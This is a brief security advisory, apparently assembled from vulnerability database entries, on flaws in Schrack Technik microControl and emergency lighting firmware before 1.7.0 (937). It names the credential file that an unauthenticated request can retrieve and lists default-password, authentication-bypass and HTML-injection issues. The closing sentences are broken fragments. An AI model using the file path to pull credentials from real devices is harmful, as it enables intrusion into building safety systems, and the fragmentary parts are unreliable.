Schrack Technik microControl with firmware before 1.7.0 (937) stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain access data for the ftp and telnet services via a direct request for ZTPUsrDtls.txt. Schrack Emergency Lights System is a set of emergency lighting system of Austria Schrack company. The system includes self-contained emergency luminaires, low power systems (LPS), and more. Schrack Emergency Lights System versions prior to 1.7.0 (937) have the following security vulnerabilities: 1. Insecure default password vulnerability 2. Authentication bypass vulnerability 3. HTML injection vulnerability 4. Information disclosure vulnerability. Attackers can use these vulnerabilities to bypass authentication mechanisms, perform unauthorized operations, obtain sensitive information, and execute arbitrary script code in the context of affected browsers. Steal cookie-based authentication. Multiple HTML-injection vulnerabilities 4. Schrack Technik microControl is a distributed power supply system (low power consumption system) of Schrack Technik Company in Austria